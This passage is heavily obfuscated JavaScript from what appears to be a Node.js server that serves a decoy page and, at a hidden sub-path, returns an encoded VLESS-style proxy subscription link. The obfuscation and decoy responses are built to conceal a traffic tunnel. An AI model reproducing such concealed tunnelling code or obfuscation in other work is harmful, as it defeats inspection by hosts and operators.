4,_0xfd816a:0x465,_0x2086eb:0x42e,_0x906742:0x45c,_0x5ccd8a:0x456,_0x5348c5:0x440,_0xfcca49:0x4a8,_0x4ff408:0x3ee,_0x26b601:0x436,_0x29a7f1:0x392,_0x41b14a:0x4bb,_0x41551a:0x48f,_0x496c0c:0x499,_0x8925a9:0x4c6,_0x12c041:0x44c,_0x404db8:0x4b1,_0xa39418:0x43d,_0x56b294:0x430,_0x1e62be:0x4aa,_0x188a97:0x4ce,_0x110c16:0x4b7,_0x45683b:0x4ab,_0x20e525:0x49a,_0x4c6ba6:0x472,_0x11226e:0x4b5,_0x11c74b:0x3c0,_0x3039dc:0x3f0},_0x1b09b2={_0x22bcae:0x47c,_0x3475af:0x47b,_0x4fd8ab:0x3e6,_0x6bb709:0x518,_0x292a45:0x504,_0x5e06f6:0x533,_0x3cd774:0x81,_0x44e2dc:0x9a,_0x469385:0x18,_0x42d3f2:0x5a,_0x53cc4c:0xb7,_0x8bb957:0x45d,_0x3ba5d7:0x42c,_0x477a56:0x44b,_0x581c82:0x3ba,_0x217f35:0xe5,_0x582709:0xa2,_0x5d4150:0xe9,_0x25fb1a:0x3e2,_0x137f2a:0x434,_0x1c61fc:0x40c,_0x1b84f5:0x3b5,_0x29d062:0x13b,_0x4a3523:0xcf,_0xce7405:0x17c,_0x31a29e:0x102,_0x4b3cd0:0x133,_0x25e992:0x195,_0x6d1118:0x4c7,_0x569974:0x426,_0x324edd:0x7a,_0x1d39d7:0x9b,_0x3f6c3c:0xf2,_0x5a1713:0x4d1,_0x170737:0x49f,_0x1553fb:0x4b2,_0x57c20e:0x4c5,_0x4636ae:0x4a7,_0x2e8719:0x447,_0x22d77b:0x18,_0x51c975:0x5b,_0x27b167:0xa1,_0xa5cc7b:0x5e,_0xdf46ac:0x62,_0xd0ac0e:0x6b,_0x2c0905:0x16d,_0x34ff4c:0x106,_0x3c2cc1:0x127,_0x2b8125:0xe6,_0x51a260:0x4c6,_0x291816:0xda,_0x358682:0x103,_0xc8c378:0xd3,_0x46bdbf:0x17f,_0xfcb4a5:0x4d1,_0x4e7c58:0x4ed,_0x2baf37:0x501,_0x15de4b:0x507,_0x52b5cd:0x4d7,_0x1a2457:0x4e0,_0x377fff:0x4bb,_0x5c46e2:0xd2,_0x424951:0x96,_0x229889:0x9a,_0x419c56:0x96,_0x113f71:0x127,_0x17363b:0x10c},_0x1e5869={_0x4ea970:0x2d,_0x1873b6:0x143,_0x52e5fa:0x1e8},_0x3f0d4d={_0x306ac1:0x147,_0x578f3c:0x1bb,_0x20ff1b:0x19a,_0xcb13cf:0x1d5,_0x627fb4:0x9b,_0x47880f:0x114,_0x228bda:0x105,_0x433129:0x10a,_0x3a9505:0x12b,_0x447045:0x115,_0x5f2c46:0x1f1,_0x350c22:0x13e,_0x3f5c3d:0x145,_0x44e2e2:0xd6,_0x4c29d4:0xda,_0x3c9dd8:0xbc,_0x4fb8e7:0x114,_0xbad3a:0x11f,_0x31c797:0xd7,_0x1dc4a1:0x101,_0x488180:0xc7,_0x15c8bd:0x136,_0x2ce213:0x132,_0x5c912a:0x131,_0x12aa58:0x136,_0x2c9b5e:0x151,_0x4ec9ea:0xf0,_0x6756:0x10d,_0x362125:0xe3,_0x3aa5d6:0x101,_0x2a5b09:0x30,_0x1d9d11:0x71,_0x35d25f:0x2e,_0x110f21:0x54,_0x44b4ed:0x172,_0x52ba6c:0xf3,_0x44057e:0x188,_0xcd22b0:0x188,_0x25be2d:0xb1,_0x960cb1:0x76},_0x4945c4={_0x3ac2eb:0x2b,_0x352ad1:0xf9},_0x4f4584={_0xde9080:0x396,_0x5b80ac:0x1b,_0x515550:0xb8},_0x39ee17={_0xada3ff:0x3bc,_0x3af500:0x113},_0x57ee97={'uryba':function(_0xeca637,_0x1cb2e6){return _0xeca637===_0x1cb2e6;},'OAtYh':_0x534432(0x453,_0xe248b2._0x489539,_0xe248b2._0x154dc5,0x406),'hnqIA':_0x19ffcf(0x304,_0xe248b2._0x306e3a,_0xe248b2._0x1d7c7d,_0xe248b2._0x7af176),'XDrqb':'text/html','LPjVb':_0x19ffcf(_0xe248b2._0x561662,_0xe248b2._0x14acbc,_0xe248b2._0x46aae4,_0xe248b2._0x47e482),'WgHia':'error','qRZcT':function(_0x16b4be){return _0x16b4be();},'xEtrr':'tls;','bPDmB':_0x19ffcf(0x3dc,_0xe248b2._0x362567,_0xe248b2._0x5abe87,0x3be),'rcWFA':function(_0x286d08,_0x31ce1b){return _0x286d08+_0x31ce1b;},'oXfqE':'sVqCU','oaXZz':_0x19ffcf(0x41e,0x3ae,_0xe248b2._0x22977f,_0xe248b2._0x282a26),'uepwH':function(_0x3d626d,_0x223b32){return _0x3d626d===_0x223b32;},'zmnBZ':_0x19ffcf(_0xe248b2._0x17e4ab,_0xe248b2._0x36f6d9,_0xe248b2._0x246d4d,_0xe248b2._0x2a78f9),'GWGNt':_0x19ffcf(0x3b2,_0xe248b2._0x15f5f7,_0xe248b2._0xe145a2,_0xe248b2._0x7d9cd0),'khccc':function(_0x2745cf,_0x3e7d2b){return _0x2745cf===_0x3e7d2b;},'JnGac':function(_0xdcbcf5,_0x4500d0){return _0xdcbcf5!==_0x4500d0;},'Omxdd':'ZRGDZ','XpfNL':'wYLOB','JORBc':_0x19ffcf(0x325,0x318,_0xe248b2._0x2fc43d,0x38e),'yGXWd':_0x534432(_0xe248b2._0x2ee8c3,_0xe248b2._0x54ec35,_0xe248b2._0x1952c7,0x457),'dfElL':function(_0x1a2e01){return _0x1a2e01();},'SiDVJ':'Not\x20Found\x0a'};function _0x534432(_0x125c48,_0x258c24,_0x4755f9,_0x6f9a56){return _0x18aada(_0x4755f9,_0x125c48-_0x39ee17._0xada3ff,_0x4755f9-_0x39ee17._0x3af500,_0x6f9a56-0x1d1);}function _0x19ffcf(_0x5e72b6,_0x4348c3,_0x52c7c2,_0x31e5e2){return _0x20ed0c(_0x4348c3-_0x4f4584._0xde9080,_0x4348c3-_0x4f4584._0x5b80ac,_0x52c7c2-_0x4f4584._0x515550,_0x52c7c2);}if(_0x57ee97[_0x19ffcf(_0xe248b2._0x1568eb,_0xe248b2._0x10460e,_0xe248b2._0x146213,_0xe248b2._0x27e5ad)](_0x14612e['url'],'/')){if(_0x57ee97[_0x534432(_0xe248b2._0x58d8bd,_0xe248b2._0x2f1f6c,_0xe248b2._0x390c25,_0xe248b2._0x25ae33)](_0x57ee97[_0x19ffcf(_0xe248b2._0x518534,_0xe248b2._0x48c540,_0xe248b2._0x3bd4fc,_0xe248b2._0x1d44ee)],_0x57ee97['XpfNL'])){const _0x3f3f94=path['join'](__dirname,_0x57ee97[_0x19ffcf(_0xe248b2._0x44edee,_0xe248b2._0x567c98,_0xe248b2._0x4f0d44,_0xe248b2._0x3ad4c5)]);fs[_0x534432(_0xe248b2._0x4856ca,_0xe248b2._0x20b191,0x47b,_0xe248b2._0x50f427)](_0x3f3f94,_0x57ee97[_0x534432(0x4dc,_0xe248b2._0x5d7123,0x4ad,_0xe248b2._0x15052c)],(_0x5553c9,_0x412cdd)=>{const _0xc3071a={_0x2a39f1:0x12b};function _0x3b0a9d(_0x496e56,_0x2655c6,_0x4ac0ff,_0x1d495a){return _0x19ffcf(_0x496e56-_0x4945c4._0x3ac2eb,_0x4ac0ff- -0x242,_0x1d495a,_0x1d495a-_0x4945c4._0x352ad1);}function _0x44eb82(_0x4e8e27,_0x5c38b9,_0x101620,_0x1ce213){return _0x534432(_0x1ce213- -0x3a9,_0x5c38b9-0x1ad,_0x101620,_0x1ce213-_0xc3071a._0x2a39f1);}if(_0x57ee97[_0x3b0a9d(_0x3f0d4d._0x306ac1,_0x3f0d4d._0x578f3c,_0x3f0d4d._0x20ff1b,_0x3f0d4d._0xcb13cf)](_0x57ee97[_0x3b0a9d(_0x3f0d4d._0x627fb4,_0x3f0d4d._0x47880f,_0x3f0d4d._0x228bda,_0x3f0d4d._0x433129)],_0x57ee97['OAtYh'])){if(_0x5553c9){if(_0x57ee97[_0x44eb82(_0x3f0d4d._0x3a9505,_0x3f0d4d._0x447045,0x17b,_0x3f0d4d._0x47880f)](_0x57ee97[_0x3b0a9d(_0x3f0d4d._0x5f2c46,_0x3f0d4d._0x350c22,0x190,_0x3f0d4d._0x3f5c3d)],_0x57ee97[_0x44eb82(_0x3f0d4d._0x44e2e2,_0x3f0d4d._0x4c29d4,_0x3f0d4d._0x3c9dd8,_0x3f0d4d._0x433129)])){const _0x89f5d0={};_0x89f5d0['Content-Type']=_0x57ee97['XDrqb'],_0x1af98a[_0x44eb82(_0x3f0d4d._0x4fb8e7,_0x3f0d4d._0xbad3a,_0x3f0d4d._0x31c797,_0x3f0d4d._0x1dc4a1)](0x6*0x1c0+-0x1d7b+0x13c3*0x1,_0x89f5d0),_0x1af98a['end'](_0x57ee97[_0x44eb82(_0x3f0d4d._0x488180,_0x3f0d4d._0x15c8bd,_0x3f0d4d._0x2ce213,_0x3f0d4d._0x5c912a)]);return;}else{const _0x3ace80=_0x11f697[_0x15fdc2];_0x1186bc+=-0xdc6+-0x3f6*-0x5+-0x607,_0x71a496=_0xccaaa1['slice'](_0x5a1b86,_0x37a798+_0x3ace80)[_0x44eb82(_0x3f0d4d._0x12aa58,0xe0,_0x3f0d4d._0x2c9b5e,_0x3f0d4d._0x4ec9ea)](),_0x1b3fa3+=_0x3ace80;}}const _0x1dc0bd={};_0x1dc0bd[_0x44eb82(_0x3f0d4d._0x6756,_0x3f0d4d._0x362125,_0x3f0d4d._0x3aa5d6,0x94)]=_0x44eb82(_0x3f0d4d._0x2a5b09,_0x3f0d4d._0x1d9d11,_0x3f0d4d._0x35d25f,_0x3f0d4d._0x110f21),_0x1af98a[_0x44eb82(_0x3f0d4d._0x44b4ed,0x14a,_0x3f0d4d._0x52ba6c,_0x3f0d4d._0x3aa5d6)](0x1cf+0x45*0x40+-0x1247,_0x1dc0bd),_0x1af98a[_0x3b0a9d(0x1ed,0x18e,_0x3f0d4d._0x44057e,_0x3f0d4d._0xcd22b0)](_0x412cdd);}else{if(_0x44319e){const _0x2101e9=_0x17a9ac[_0x44eb82(0x77,0xa5,_0x3f0d4d._0x25be2d,_0x3f0d4d._0x960cb1)](_0x31efef,arguments);return _0x3506a0=null,_0x2101e9;}}});return;}else _0xb6e2a5<_0x46b46d[_0x534432(_0xe248b2._0x310eee,_0xe248b2._0xfd816a,_0xe248b2._0x2086eb,0x3fe)]&&this['write'](_0x53a5bc['slice'](_0x32f70a)),_0x59426e['on'](_0x57ee97['WgHia'],()=>{})['pipe'](this)['on'](_0x57ee97['WgHia'],()=>{})['pipe'](_0x1adf92);}else{if(_0x57ee97[_0x534432(_0xe248b2._0x906742,_0xe248b2._0x5ccd8a,_0xe248b2._0x5348c5,_0xe248b2._0xfcca49)](_0x14612e[_0x534432(_0xe248b2._0x4ff408,_0xe248b2._0x26b601,0x44d,_0xe248b2._0x29a7f1)],'/'+SUB_PATH))_0x57ee97[_0x534432(_0xe248b2._0x41b14a,_0xe248b2._0x41551a,_0xe248b2._0x496c0c,_0xe248b2._0x8925a9)](GetConfig)[_0x534432(_0xe248b2._0x12c041,_0xe248b2._0x404db8,_0xe248b2._0x2086eb,0x3d6)](()=>{const _0x430b1e={_0x2ed97e:0xac,_0x4b6747:0x460,_0x5904e7:0xb9};function _0x1afcc1(_0x3bf022,_0x18ced5,_0x54f870,_0xb53684){return _0x534432(_0x18ced5-_0x1e5869._0x4ea970,_0x18ced5-_0x1e5869._0x1873b6,_0x3bf022,_0xb53684-_0x1e5869._0x52e5fa);}function _0x1cae4b(_0x1fc7a2,_0x23b0f5,_0x103da0,_0x4c06f4){return _0x19ffcf(_0x1fc7a2-_0x430b1e._0x2ed97e,_0x23b0f5- -_0x430b1e._0x4b6747,_0x103da0,_0x4c06f4-_0x430b1e._0x5904e7);}const _0x39b55f={'StcFp':function(_0xa4fd82,_0x5414d8){return _0xa4fd82===_0x5414d8;},'JIkqw':_0x57ee97[_0x1afcc1(_0x1b09b2._0x22bcae,0x433,_0x1b09b2._0x3475af,_0x1b09b2._0x4fd8ab)],'pzlMo':_0x1afcc1(_0x1b09b2._0x6bb709,_0x1b09b2._0x292a45,0x530,_0x1b09b2._0x5e06f6),'ptzpT':_0x57ee97[_0x1cae4b(-0x14,-_0x1b09b2._0x3cd774,-_0x1b09b2._0x44e2dc,-0xc)],'AusrM':function(_0x8736ae,_0x41f091){return _0x57ee97['rcWFA'](_0x8736ae,_0x41f091);}};if(_0x57ee97[_0x1cae4b(_0x1b09b2._0x469385,-_0x1b09b2._0x42d3f2,-_0x1b09b2._0x53cc4c,-0xc4)]!==_0x57ee97[_0x1afcc1(_0x1b09b2._0x8bb957,_0x1b09b2._0x3ba5d7,_0x1b09b2._0x477a56,_0x1b09b2._0x581c82)]){const _0xe04716=NAME?NAME+'-'+ISP:ISP,_0x3160be=_0x57ee97[_0x1cae4b(-0xc9,-_0x1b09b2._0x217f35,-_0x1b09b2._0x582709,-_0x1b09b2._0x5d4150)](Tls,_0x57ee97[_0x1afcc1(_0x1b09b2._0x25fb1a,_0x1b09b2._0x137f2a,_0x1b09b2._0x1c61fc,_0x1b09b2._0x1b84f5)])?_0x57ee97[_0x1cae4b(-0x142,-_0x1b09b2._0x29d062,-_0x1b09b2._0x4a3523,-_0x1b09b2._0xce7405)]:'',_0x4381c6=Buffer[_0x1cae4b(-_0x1b09b2._0x31a29e,-0x138,-_0x1b09b2._0x4b3cd0,-_0x1b09b2._0x25e992)](_0x1afcc1(_0x1b09b2._0x6d1118,0x46c,_0x1b09b2._0x569974,_0x1b09b2._0x22bcae)+UUID)[_0x1cae4b(-_0x1b09b2._0x324edd,-0xa8,-_0x1b09b2._0x1d39d7,-_0x1b09b2._0x3f6c3c)](_0x57ee97['GWGNt']),_0x5406b6=_0x1afcc1(_0x1b09b2._0x5a1713,0x48b,_0x1b09b2._0x170737,0x473)+_0x4381c6+'@'+CurrentDomain+':'+CurrentPort+_0x1afcc1(_0x1b09b2._0x1553fb,_0x1b09b2._0x57c20e,_0x1b09b2._0x4636ae,_0x1b09b2._0x2e8719)+CurrentDomain+_0x1cae4b(-_0x1b09b2._0x22d77b,-_0x1b09b2._0x51c975,-_0x1b09b2._0x27b167,-0x22)+WSPATH+';'+_0x3160be+_0x1cae4b(-0x85,-_0x1b09b2._0xa5cc7b,-_0x1b09b2._0xdf46ac,-_0x1b09b2._0xd0ac0e)+CurrentDomain+_0x1cae4b(-_0x1b09b2._0x2c0905,-_0x1b09b2._0x34ff4c,-_0x1b09b2._0x3c2cc1,-_0x1b09b2._0x2b8125)+_0xe04716,_0x483be3=Buffer['from'](_0x5406b6)[_0x1afcc1(0x517,_0x1b09b2._0x51a260,0x480,0x545)](_0x57ee97[_0x1cae4b(-_0x1b09b2._0x291816,-0xae,-_0x1b09b2._0x358682,-_0x1b09b2._0xc8c378)]),_0x2a4496={};_0x2a4496[_0x1cae4b(-0x114,-0x104,-_0x1b09b2._0xc8c378,-_0x1b09b2._0x46bdbf)]=_0x57ee97[_0x1afcc1(_0x1b09b2._0xfcb4a5,_0x1b09b2._0x4e7c58,_0x1b09b2._0x2baf37,_0x1b09b2._0x15de4b)],_0x1af98a[_0x1afcc1(0x557,_0x1b09b2._0x52b5cd,_0x1b09b2._0x1a2457,_0x1b09b2._0x377fff)](-0x2d6*0x4+-0x3*-0x507+0x1*-0x2f5,_0x2a4496),_0x1af98a[_0x1cae4b(-_0x1b09b2._0x5c46e2,-_0x1b09b2._0x424951,-0x19,-_0x1b09b2._0x229889)](_0x483be3+'\x0a');}else{const _0x1a87c8={_0x21bd9d:0x175,_0x10ae21:0x130,_0x3ccb2a:0xd7,_0x58897f:0x163,_0x27f102:0xf7,_0x58fdf0:0x88,_0x24fddd:0x1b,_0x24a1c7:0x85,_0xad3fab:0x3e,_0x247f6b:0x3bc,_0x12aa23:0x3d6,_0x5d9a5e:0x415,_0x223c55:0x138,_0x33f85a:0x113,_0x567e66:0xe3,_0x44cb08:0x453,_0x3aca98:0x4df,_0x464447:0x4a2,_0x392328:0x77,_0x6bf88e:0x63,_0x1dc027:0x86,_0x385694:0x476,_0x1acce4:0x3d5,_0x22c518:0x450,_0x983528:0x4ad,_0x1a4f78:0x43,_0x2d3361:0x44,_0x4de3b2:0x93,_0x5e9af5:0x3e,_0x2c1537:0x8a,_0x345f7a:0xd3,_0x221721:0x88,_0x58fc4a:0x120,_0x19a51a:0x129,_0x514faf:0xbe,_0x2ddc88:0xf4,_0x1bedee:0xd1,_0x33d7ca:0x152,_0x31b710:0xf6,_0x2129b7:0xf,_0x10f50f:0x6a,_0x1a4647:0x64},_0x2d43b0={_0x1aa201:0x68,_0x36d800:0x18c,_0x3cd0b0:0xee};_0x57ee97[_0x1cae4b(-_0x1b09b2._0x419c56,-_0x1b09b2._0x358682,-_0x1b09b2._0x113f71,-_0x1b09b2._0x17363b)](_0x285f0b)['then'](()=>{const _0x350b14={_0x3671ad:0x121,_0x57afe3:0x4f8,_0x464e3c:0x137},_0x1bc734=_0x331e3e?_0x317345+'-'+_0x26ec0e:_0xf22aa6;function _0x2fa34a(_0x7055c8,_0x5928a4,_0x43ec03,_0x174262){return _0x1cae4b(_0x7055c8-_0x2d43b0._0x1aa201,_0x174262-_0x2d43b0._0x36d800,_0x43ec03,_0x174262-_0x2d43b0._0x3cd0b0);}function _0x177c91(_0x5e40fc,_0x46a02e,_0x5bcab3,_0x24e86f){return _0x1cae4b(_0x5e40fc-_0x350b14._0x3671ad,_0x5bcab3-_0x350b14._0x57afe3,_0x24e86f,_0x24e86f-_0x350b14._0x464e3c);}const _0x559a03=_0x39b55f[_0x2fa34a(_0x1a87c8._0x21bd9d,_0x1a87c8._0x10ae21,0x166,0x10d)](_0x100bff,'tls')?_0x39b55f['JIkqw']:'',_0x363aa8=_0x416b19['from']('none:'+_0x50279d)[_0x2fa34a(_0x1a87c8._0x3ccb2a,_0x1a87c8._0x58897f,_0x1a87c8._0x27f102,0xe4)](_0x39b55f[_0x2fa34a(_0x1a87c8._0x58fdf0,-_0x1a87c8._0x24fddd,_0x1a87c8._0x24a1c7,_0x1a87c8._0xad3fab)]),_0x3c8a9f=_0x177c91(_0x1a87c8._0x247f6b,_0x1a87c8._0x12aa23,_0x1a87c8._0x5d9a5e,0x458)+_0x363aa8+'@'+_0x20db98+':'+_0x10b52a+_0x2fa34a(0xaa,_0x1a87c8._0x223c55,_0x1a87c8._0x33f85a,_0x1a87c8._0x567e66)+_0x4a92f5+';path%3D%2F'+_0x22ccba+';'+_0x559a03+_0x177c91(_0x1a87c8._0x44cb08,_0x1a87c8._0x3aca98,0x49a,_0x1a87c8._0x464447)+_0x16c22c+_0x2fa34a(_0x1a87c8._0x392328,0x6,_0x1a87c8._0x6bf88e,_0x1a87c8._0x1dc027)+_0x1bc734,_0x5a1199=_0x538b64['from'](_0x3c8a9f)[_0x177c91(_0x1a87c8._0x385694,_0x1a87c8._0x1acce4,_0x1a87c8._0x22c518,_0x1a87c8._0x983528)](_0x39b55f[_0x2fa34a(_0x1a87c8._0x1a4f78,_0x1a87c8._0x2d3361,_0x1a87c8._0x4de3b2,_0x1a87c8._0x5e9af5)]),_0x162757={};_0x162757[_0x2fa34a(_0x1a87c8._0x2c1537,0x12,_0x1a87c8._0x345f7a,_0x1a87c8._0x221721)]=_0x39b55f['ptzpT'],_0x5aff27[_0x2fa34a(_0x1a87c8._0x58fc4a,_0x1a87c8._0x19a51a,_0x1a87c8._0x514faf,0xf5)](-0x2*0xac4+0x1a7d+-0x42d,_0x162757),_0x26d39b[_0x2fa34a(_0x1a87c8._0x2ddc88,_0x1a87c8._0x1bedee,_0x1a87c8._0x33d7ca,_0x1a87c8._0x31b710)](_0x39b55f[_0x2fa34a(_0x1a87c8._0x2129b7,_0x1a87c8._0x10f50f,-0x1b,_0x1a87c8._0x1a4647)](_0x5a1199,'\x0a'));});}});else{const _0x1458cf={};_0x1458cf[_0x534432(_0xe248b2._0xa39418,0x4a9,_0xe248b2._0x56b294,0x440)]=_0x57ee97['bPDmB'],_0x1af98a[_0x534432(_0xe248b2._0x1e62be,_0xe248b2._0x188a97,0x50b,_0xe248b2._0x110c16)](0x1*-0xa09+0x1*-0x306+0xea3,_0x1458cf),_0x1af98a[_0x534432(_0xe248b2._0x45683b,_0xe248b2._0x20e525,_0xe248b2._0x4c6ba6,_0xe248b2._0x11226e)](_0x57ee97[_0x19ffcf(0x3c5,_0xe248b2._0x11c74b,_0xe248b2._0x3039dc,0x414)]);}}});function resolveHost(_0x2c1bc7){const _0x4a4c77={_0x2fba46:0x2ba,_0x4888ee:0x30b,_0x1aa62e:0x304,_0x22800d:0x21d,_0xa01a07:0x219,_0x165c14:0x259,_0x23d038:0x235,_0x55a3ea:0x2ed,_0x36ddd4:0x248,_0x43c775:0x2e7,_0x11a792:0x2b6,_0x702017:0x26c,_0x4ba273:0x2e0,_0x57fb64:0x30c,_0x5166fe:0x2f5,_0x2cbad0:0x1ea,_0x285349:0x28a,_0x3e3403:0x257,_0xc4d66a:0x20c},_0x6fee44={_0x230e60:0x14c,_0x375cc5:0x147,_0x5ebcd8:0x46a,_0x22dbaa:0x4ad},_0x746c1c={_0x271fd2:0x133,_0x40f5a2:0x124},_0x38088f={_0x12edf6:0x5f,_0x565b05:0x1d9,_0x321dc2:0x2b1},_0x3741b6={_0x2722ef:0x164,_0x47c1bb:0x11c};function _0x38ed1d(_0x472ad4,_0x102373,_0x32b75d,_0x23cb03){return _0x20ed0c(_0x23cb03-0x2fd,_0x102373-0x90,_0x32b75d-0x1f0,_0x32b75d);}function _0x40d694(_0x14f9e4,_0x5d7dcb,_0x391beb,_0x40a6b7){return _0x18aada(_0x14f9e4,_0x40a6b7-_0x3741b6._0x2722ef,_0x391beb-0x43,_0x40a6b7-_0x3741b6._0x47c1bb);}const _0x20a948={'kUrFF':_0x38ed1d(0x2ea,_0x4a4c77._0x2fba46,_0x4a4c77._0x4888ee,_0x4a4c77._0x1aa62e),'QJOmg':_0x40d694(_0x4a4c77._0x22800d,_0x4a4c77._0xa01a07,_0x4a4c77._0x165c14,_0x4a4c77._0x23d038),'sNnSY':function(_0x188246,_0x213a8a){return _0x188246===_0x213a8a;},'Mwxmk':function(_0x2a3ace,_0x8318a3){return _0x2a3ace>_0x8318a3;},'PYGqF':_0x38ed1d(_0x4a4c77._0x55a3ea,_0x4a4c77._0x36ddd4,_0x4a4c77._0x43c775,_0x4a4c77._0x11a792),'VKFTX':function(_0x40a514,_0x44a2e1){return _0x40a514(_0x44a2e1);},'GxJIK':function(_0x412169,_0x4814fe,_0x55cf08){return _0x412169(_0x4814fe,_0x55cf08);},'taotj':_0x38ed1d(_0x4a4c77._0x702017,0x35c,0x2af,_0x4a4c77._0x4ba273),'PEjZj':_0x38ed1d(0x3dd,_0x4a4c77._0x57fb64,_0x4a4c77._0x5166fe,0x359),'LEdKA':function(_0x4e7b62,_0x27ea2a){return _0x4e7b62(_0x27ea2a);},'qiywV':_0x40d694(_0x4a4c77._0x2cbad0,_0x4a4c77._0x285349,_0x4a4c77._0x3e3403,_0x4a4c77._0xc4d66a),'ORbun':function(_0x2aede9,_0x136da6){return _0x2aede9(_0x136da6);},'pOfDm':function(_0x41ff48){return _0x41ff48();}};return new Promise((_0x19a4f1,_0x544485)=>{const _0x2a59e9={_0xe547b6:0xaf,_0x4be667:0x129,_0x42a6bb:0xaa,_0x583836:0xc2,_0x2983b9:0x9e,_0x204524:0xb3,_0x29fb4c:0x53,_0x345a8c:0x30,_0xcb947d:0x55,_0x64ccda:0x5f,_0x48898e:0x58,_0x19ef35:0x2,_0x10cb84:0x24,_0x25d1ee:0x6f,_0x41ad0d:0x18,_0x2724de:0xac,_0x56dc77:0x91,_0x1ce261:0x86,_0x252f50:0x16,_0x2f5e7c:0x28,_0x43edf4:0x29,_0x34c31b:0x2c,_0x48c169:0x17,_0x3aa410:0x56,_0x245b5a:0x69,_0x17c457:0x1a,_0x448802:0x33,_0x21d203:0x44,_0x2cfd83:0x62,_0x4095fd:0x56,_0x571516:0x22,_0x45d533:0x74,_0x4415b5:0x27,_0x7ad62e:0x94,_0x105516:0xea,_0x3f1e39:0x85,_0x18e267:0x4b,_0x21c769:0x26,_0x113710:0x7b,_0x46eefa:0x8b,_0x2637b2:0x1e,_0x4c4765:0x9f,_0x432237:0xf5,_0x11fd5d:0x155,_0x305865:0x7c,_0x1dfa59:0x14c,_0x28f855:0x9,_0x330cd6:0x34,_0x4f9585:0xb,_0x1c8348:0x45,_0x2f2388:0x27,_0x3dfcab:0x42,_0x5b1a0a:0xb2,_0x1d8f97:0x70,_0x4a8af6:0xdc,_0x562f23:0xe6,_0x42e9b3:0xdb,_0x3e2c5e:0x11,_0x2b6583:0x6c,_0x54d9da:0x51,_0x5627f8:0x72,_0x558f63:0x4c,_0x245bfa:0xd2},_0x321c77={_0x55005b:0xb8},_0x9a32a5={_0x1317d9:0x2fc,_0x544232:0x33e};if(/^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$/[_0x24390e(_0x6fee44._0x230e60,0x125,_0x6fee44._0x375cc5,0xd6)](_0x2c1bc7)){_0x20a948['ORbun'](_0x19a4f1,_0x2c1bc7);return;}let _0x2364e8=0x1b7c*-0x1+-0xcce+0x12*0x23d;function _0x13b903(){const _0xd82be={_0x118507:0x23b,_0x281b76:0x274,_0x4266b5:0x264,_0x10c238:0x23e,_0x7820c8:0x1e6,_0x2cdab5:0x292},_0x6f12c3={_0x40b0ca:0x162,_0x27d568:0x1cf,_0x1891f1:0x1b2,_0x976d24:0x171,_0xfd7687:0x2a0,_0x5e149d:0x241,_0x123200:0x198,_0x23f5a0:0x214,_0x565a5c:0x1f9,_0x1ca234:0x1d2,_0x2ef89f:0x14e,_0x4c3a22:0x1dd,_0x3a6b2f:0x1a0,_0x5c93d3:0x1e0,_0x5446ef:0x1ed,_0x5484f2:0x205,_0x34fe9b:0x165,_0x285054:0x1d1,_0x14669e:0x1c2,_0x29090d:0x190,_0xe8fc:0x1db,_0x3200cd:0x184,_0x530c21:0x20e,_0x4f0cf1:0x27c,_0x450e35:0x265,_0x485178:0x2ad,_0x1645ef:0x1c9,_0x4abd81:0x156,_0x44e164:0x1e6,_0x173239:0x194,_0x5d0662:0x1cc,_0x40e4b6:0x1e1,_0x5089cc:0x240,_0x38961b:0x265,_0x22c6bd:0x24e,_0x250322:0xe8,_0x4fecb3:0xb7,_0x29a78f:0x7d,_0x4ee324:0x112,_0x3bb489:0xcf},_0x1e397e={_0x1d37b8:0x110,_0x855581:0x148},_0x620ed8={_0x2e9791:0xb8},_0x275609={_0x433440:0x150,_0x35abe5:0x7b,_0x336b46:0x16},_0x51bf19={'teqTx':_0x20a948[_0x42f5d3(_0x2a59e9._0xe547b6,_0x2a59e9._0x4be667,_0x2a59e9._0x42a6bb,_0x2a59e9._0x583836)],'BjuDG':_0x20a948[_0x42f5d3(0xd2,0x102,_0x2a59e9._0x2983b9,0xb4)],'eAMfs':function(_0x327082,_0x5eff77){return _0x20a948['sNnSY'](_0x327082,_0x5eff77);},'HBvpC':function(_0x52e585,_0x5348f0){const _0x2a2062={_0x505b58:0x20e,_0x4bec04:0x2c};function _0x3c0198(_0xc7db26,_0x1d80a8,_0x4ad3b9,_0x3ea78e){return _0x42f5d3(_0x4ad3b9-_0x2a2062._0x505b58,_0x1d80a8-_0x2a2062._0x4bec04,_0x3ea78e,_0x3ea78e-0x1a2);}return _0x20a948[_0x3c0198(0x2fd,0x2ef,_0x9a32a5._0x1317d9,_0x9a32a5._0x544232)](_0x52e585,_0x5348f0);},'GtBAF':_0x42f5d3(_0x2a59e9._0x204524,_0x2a59e9._0x29fb4c,_0x2a59e9._0x345a8c,_0x2a59e9._0xcb947d),'cgdBB':function(_0x59f081,_0x40dea8){return _0x59f081!==_0x40dea8;},'jHNqT':_0x20a948[_0xaaf8c6(0xf,_0x2a59e9._0x64ccda,_0x2a59e9._0x48898e,_0x2a59e9._0x19ef35)],'XozUl':function(_0x193a6e,_0x24e3f3){return _0x20a948['VKFTX'](_0x193a6e,_0x24e3f3);},'Ldtjf':function(_0x3ccd8e){return _0x3ccd8e();},'wiZMc':function(_0x59aabb,_0x22011e,_0x34fcaa){return _0x20a948['GxJIK'](_0x59aabb,_0x22011e,_0x34fcaa);}};function _0xaaf8c6(_0x198089,_0x31c88c,_0x4ae9d7,_0x200ec6){return _0x24390e(_0x198089-_0x321c77._0x55005b,_0x31c88c-0x45,_0x198089,_0x200ec6- -0xa1);}if(_0x2364e8>=DNS_SERVERS['length']){if(_0x20a948['sNnSY'](_0x20a948[_0xaaf8c6(_0x2a59e9._0x10cb84,0x69,0xe1,_0x2a59e9._0x25d1ee)],_0x20a948[_0xaaf8c6(_0x2a59e9._0x41ad0d,_0x2a59e9._0x2724de,_0x2a59e9._0x56dc77,_0x2a59e9._0x1ce261)])){if(_0x3bafff){const _0x1a152f={};_0x1a152f[_0xaaf8c6(_0x2a59e9._0x252f50,_0x2a59e9._0x2f5e7c,0x14,-_0x2a59e9._0x43edf4)]=_0xaaf8c6(-_0x2a59e9._0x34c31b,_0x2a59e9._0x48c169,-_0x2a59e9._0x3aa410,-_0x2a59e9._0x245b5a),_0x280e9f[_0xaaf8c6(_0x2a59e9._0x17c457,_0x2a59e9._0x448802,0x6d,_0x2a59e9._0x21d203)](0x347+-0x1bea+0x196b*0x1,_0x1a152f),_0x30bc33['end']('Hello\x20world!');return;}const 